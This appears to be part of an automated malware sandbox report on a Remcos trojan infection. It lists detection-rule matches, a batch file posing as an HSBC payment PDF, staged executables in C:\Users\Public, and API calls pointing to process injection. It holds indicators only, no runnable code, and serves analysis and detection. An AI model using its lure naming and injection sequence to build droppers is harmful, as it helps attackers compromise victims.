              Source: Process Memory Space: AnyDesk.PIF PID: 7748, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: SndVol.exe PID: 8072, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: SndVol.exe PID: 5612, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: SndVol.exe PID: 7296, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Found large BAT file
              Source: USD470900_COPY_800BLHSBC882001.PDF.batStatic file information: 3383372
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E889E4 NtQueryInformationToken,NtQueryInformationToken,4_2_00007FF6A0E889E4
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,4_2_00007FF6A0E73D94
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E8898C NtQueryInformationToken,4_2_00007FF6A0E8898C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0EA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_00007FF6A0EA1538
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,4_2_00007FF6A0E87FF8
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_00007FF6A0E88114
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_00007FF6A0E9BCF0
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_00007FF6A0E888C0
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E889E4 NtQueryInformationToken,NtQueryInformationToken,6_2_00007FF6A0E889E4
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,6_2_00007FF6A0E73D94
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E8898C NtQueryInformationToken,6_2_00007FF6A0E8898C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0EA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,6_2_00007FF6A0EA1538
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,6_2_00007FF6A0E87FF8
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,6_2_00007FF6A0E88114
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,6_2_00007FF6A0E9BCF0
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,6_2_00007FF6A0E888C0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCFC964 NtQuerySystemTime,RtlTimeToSecondsSince1970,7_2_00007FF68FCFC964
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D48730 NtQueueApcThread,10_2_02D48730
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D47A2C NtAllocateVirtualMemory,10_2_02D47A2C
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,10_2_02D4DC8C
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,10_2_02D4DC04
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,10_2_02D4DD70
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D47D78 NtWriteVirtualMemory,10_2_02D47D78
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D48D70 GetThreadContext,SetThreadContext,NtResumeThread,10_2_02D48D70
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D48D6E GetThreadContext,SetThreadContext,NtResumeThread,10_2_02D48D6E
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D47A2A NtAllocateVirtualMemory,10_2_02D47A2A
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,10_2_02D4DBB0
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E75240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,4_2_00007FF6A0E75240
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E84224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,4_2_00007FF6A0E84224
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E842244_2_00007FF6A0E84224
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E855544_2_00007FF6A0E85554
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E80A6C4_2_00007FF6A0E80A6C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E7AA544_2_00007FF6A0E7AA54
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E837D84_2_00007FF6A0E837D8
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E9AA304_2_00007FF6A0E9AA30
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E74A304_2_00007FF6A0E74A30
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E722204_2_00007FF6A0E72220
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E7CE104_2_00007FF6A0E7CE10
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E78DF84_2_00007FF6A0E78DF8
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E9D9D04_2_00007FF6A0E9D9D0
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E781D44_2_00007FF6A0E781D4
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0EA15384_2_00007FF6A0EA1538
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E7372C4_2_00007FF6A0E7372C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E97F004_2_00007FF6A0E97F00
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E76EE44_2_00007FF6A0E76EE4
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E9EE884_2_00007FF6A0E9EE88
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E7E6804_2_00007FF6A0E7E680
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E776504_2_00007FF6A0E77650
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E7D2504_2_00007FF6A0E7D250
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E79E504_2_00007FF6A0E79E50
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E752404_2_00007FF6A0E75240
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E734104_2_00007FF6A0E73410
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E76BE04_2_00007FF6A0E76BE0
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E9AFBC4_2_00007FF6A0E9AFBC
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E73F904_2_00007FF6A0E73F90
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E75B704_2_00007FF6A0E75B70
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E79B504_2_00007FF6A0E79B50
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E77D304_2_00007FF6A0E77D30
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E785104_2_00007FF6A0E78510
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E7B0D84_2_00007FF6A0E7B0D8
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E818D44_2_00007FF6A0E818D4
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E718844_2_00007FF6A0E71884
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E72C484_2_00007FF6A0E72C48
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E878544_2_00007FF6A0E87854
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E9AC4C4_2_00007FF6A0E9AC4C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E842246_2_00007FF6A0E84224
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E855546_2_00007FF6A0E85554
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E80A6C6_2_00007FF6A0E80A6C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E7AA546_2_00007FF6A0E7AA54
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E837D86_2_00007FF6A0E837D8
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E9AA306_2_00007FF6A0E9AA30
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E74A306_2_00007FF6A0E74A30
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E722206_2_00007FF6A0E72220
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E7CE106_2_00007FF6A0E7CE10
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E78DF86_2_00007FF6A0E78DF8
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E9D9D06_2_00007FF6A0E9D9D0
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E781D46_2_00007FF6A0E781D4
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0EA15386_2_00007FF6A0EA1538
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E7372C6_2_00007FF6A0E7372C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E97F006_2_00007FF6A0E97F00
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E76EE46_2_00007FF6A0E76EE4
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E9EE886_2_00007FF6A0E9EE88
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E7E6806_2_00007FF6A0E7E680
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E776506_2_00007FF6A0E77650
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E7D2506_2_00007FF6A0E7D250
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E79E506_2_00007FF6A0E79E50
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E752406_2_00007FF6A0E75240
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E734106_2_00007FF6A0E73410
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E76BE06_2_00007FF6A0E76BE0
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E9AFBC6_2_00007FF6A0E9AFBC
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E73F906_2_00007FF6A0E73F90
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E75B706_2_00007FF6A0E75B70
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E79B506_2_00007FF6A0E79B50
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E77D306_2_00007FF6A0E77D30
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E785106_2_00007FF6A0E78510
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E7B0D86_2_00007FF6A0E7B0D8
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E818D46_2_00007FF6A0E818D4
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E718846_2_00007FF6A0E71884
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E72C486_2_00007FF6A0E72C48
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E878546_2_00007FF6A0E87854
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6A0E9AC4C6_2_00007FF6A0E9AC4C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCEF0207_2_00007FF68FCEF020
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC12F387_2_00007FF68FC12F38
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCECCB87_2_00007FF68FCECCB8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCEC1207_2_00007FF68FCEC120
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCEBC107_2_00007FF68FCEBC10
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD138007_2_00007FF68FD13800
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC511C7_2_00007FF68FCC511C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5D0947_2_00007FF68FC5D094
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC4107C7_2_00007FF68FC4107C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC1B09C7_2_00007FF68FC1B09C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC010307_2_00007FF68FC01030
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA4F947_2_00007FF68FCA4F94
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC34F907_2_00007FF68FC34F90
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC28F1C7_2_00007FF68FC28F1C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3EED47_2_00007FF68FC3EED4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC06EF47_2_00007FF68FC06EF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE8EAC7_2_00007FF68FCE8EAC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE4E587_2_00007FF68FCE4E58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC76D7C7_2_00007FF68FC76D7C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2EDA47_2_00007FF68FC2EDA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE2D6C7_2_00007FF68FCE2D6C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5CD107_2_00007FF68FC5CD10
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC92CF87_2_00007FF68FC92CF8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC18D007_2_00007FF68FC18D00
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC58D2C7_2_00007FF68FC58D2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC62D187_2_00007FF68FC62D18
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF8CF47_2_00007FF68FCF8CF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7CC807_2_00007FF68FC7CC80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9CCA87_2_00007FF68FC9CCA8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD0CC8C7_2_00007FF68FD0CC8C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD8C587_2_00007FF68FCD8C58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC0AC087_2_00007FF68FC0AC08
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC4CBFC7_2_00007FF68FC4CBFC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC50C287_2_00007FF68FC50C28
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC78BD47_2_00007FF68FC78BD4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB6B947_2_00007FF68FCB6B94
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC24B687_2_00007FF68FC24B68
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC54B307_2_00007FF68FC54B30
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC86A847_2_00007FF68FC86A84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8EA7C7_2_00007FF68FC8EA7C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD4A407_2_00007FF68FCD4A40
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF4A587_2_00007FF68FCF4A58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCEAA587_2_00007FF68FCEAA58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8AA007_2_00007FF68FC8AA00
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC609EC7_2_00007FF68FC609EC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDA9F07_2_00007FF68FCDA9F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6E9F07_2_00007FF68FC6E9F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC589907_2_00007FF68FC58990
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC669847_2_00007FF68FC66984
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC029407_2_00007FF68FC02940
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE08C87_2_00007FF68FCE08C8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE48C47_2_00007FF68FCE48C4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF28547_2_00007FF68FCF2854
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8E8447_2_00007FF68FC8E844
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB07D07_2_00007FF68FCB07D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC827D07_2_00007FF68FC827D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8C7F07_2_00007FF68FC8C7F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF67507_2_00007FF68FCF6750
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7C6F87_2_00007FF68FC7C6F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6C6D07_2_00007FF68FC6C6D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCC6307_2_00007FF68FCCC630
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC686307_2_00007FF68FC68630
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD085EC7_2_00007FF68FD085EC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC105E07_2_00007FF68FC105E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC525807_2_00007FF68FC52580
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9E57C7_2_00007FF68FC9E57C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF85A87_2_00007FF68FCF85A8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD45387_2_00007FF68FCD4538
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC385707_2_00007FF68FC38570
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6655C7_2_00007FF68FC6655C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC0C5207_2_00007FF68FC0C520
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC724D47_2_00007FF68FC724D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8E4F07_2_00007FF68FC8E4F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC144E07_2_00007FF68FC144E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE84D87_2_00007FF68FCE84D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE04907_2_00007FF68FCE0490
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC984887_2_00007FF68FC98488
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC584847_2_00007FF68FC58484
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC464A87_2_00007FF68FC464A8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7C4507_2_00007FF68FC7C450
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7A4507_2_00007FF68FC7A450
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC884147_2_00007FF68FC88414
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC244107_2_00007FF68FC24410
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD1842F7_2_00007FF68FD1842F
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCEE4307_2_00007FF68FCEE430
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC0A4247_2_00007FF68FC0A424
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC943D07_2_00007FF68FC943D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC603987_2_00007FF68FC60398
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC4E3A07_2_00007FF68FC4E3A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE234C7_2_00007FF68FCE234C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC963747_2_00007FF68FC96374
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2227C7_2_00007FF68FC2227C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC762807_2_00007FF68FC76280
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5E29C7_2_00007FF68FC5E29C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE42747_2_00007FF68FCE4274
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD141F87_2_00007FF68FD141F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC821C7_2_00007FF68FCC821C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5C1D07_2_00007FF68FC5C1D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8A1E87_2_00007FF68FC8A1E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC201407_2_00007FF68FC20140
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC081707_2_00007FF68FC08170
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6C0B87_2_00007FF68FC6C0B8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD20847_2_00007FF68FCD2084
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC380807_2_00007FF68FC38080
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB9FF87_2_00007FF68FCB9FF8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC680187_2_00007FF68FC68018
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC01F807_2_00007FF68FC01F80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC95F047_2_00007FF68FC95F04
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC51ED07_2_00007FF68FC51ED0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC89EE47_2_00007FF68FC89EE4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8DEB07_2_00007FF68FC8DEB0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5DEA47_2_00007FF68FC5DEA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8BE707_2_00007FF68FC8BE70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC35DF77_2_00007FF68FC35DF7
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC91E2C7_2_00007FF68FC91E2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC11DE87_2_00007FF68FC11DE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD0DD847_2_00007FF68FD0DD84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9BDA07_2_00007FF68FC9BDA0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB7D707_2_00007FF68FCB7D70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC59D6C7_2_00007FF68FC59D6C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC61D707_2_00007FF68FC61D70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC15D087_2_00007FF68FC15D08
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3DD207_2_00007FF68FC3DD20
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC39CD07_2_00007FF68FC39CD0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC9CC07_2_00007FF68FCC9CC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5BCE87_2_00007FF68FC5BCE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC81C907_2_00007FF68FC81C90
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD0FC907_2_00007FF68FD0FC90
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC1BCA47_2_00007FF68FC1BCA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC53C607_2_00007FF68FC53C60
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB3C107_2_00007FF68FCB3C10
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5FC347_2_00007FF68FC5FC34
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3FC207_2_00007FF68FC3FC20
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC29BC87_2_00007FF68FC29BC8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6DBF07_2_00007FF68FC6DBF0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC71B847_2_00007FF68FC71B84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC0FB847_2_00007FF68FC0FB84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC05BA47_2_00007FF68FC05BA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCAFB507_2_00007FF68FCAFB50
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC97B747_2_00007FF68FC97B74
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCBB287_2_00007FF68FCCBB28
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC67AC87_2_00007FF68FC67AC8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC17AB47_2_00007FF68FC17AB4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7BA487_2_00007FF68FC7BA48
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC33A407_2_00007FF68FC33A40
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB9A587_2_00007FF68FCB9A58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC51A607_2_00007FF68FC51A60
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC01A107_2_00007FF68FC01A10
